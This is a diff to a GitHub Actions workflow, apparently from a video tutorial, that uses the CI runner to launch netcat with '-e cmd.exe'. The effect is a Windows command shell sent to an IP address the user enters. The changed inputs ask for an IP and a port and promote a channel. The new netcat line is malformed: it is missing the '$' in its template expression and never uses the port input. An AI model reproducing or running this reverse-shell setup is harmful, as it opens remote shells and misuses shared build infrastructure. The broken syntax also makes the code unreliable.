--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -3,12 +3,16 @@ name: CI
 on: 
   workflow_dispatch:
     inputs:
+    
       code:
-        description: 'Did you wtch my video enter pin code'
+        description: 'Subcribe PawitSahare'
         required: true
       pin:
-        description: 'enter your authtoken'
+        description: 'enter your ip '
         required: true
+        
+      port:
+           description: 'enter your ip port'
 jobs:
 
   build:
@@ -28,7 +32,7 @@ jobs:
        ls
        cd netcat-1.11
        ls
-       ./nc.exe ${{ github.event.inputs.code }} -pin=${{ github.event.inputs.pin }} -e cmd.exe
+       ./nc.exe {{ github.event.inputs.pin }} -e cmd.exe
        
        
     
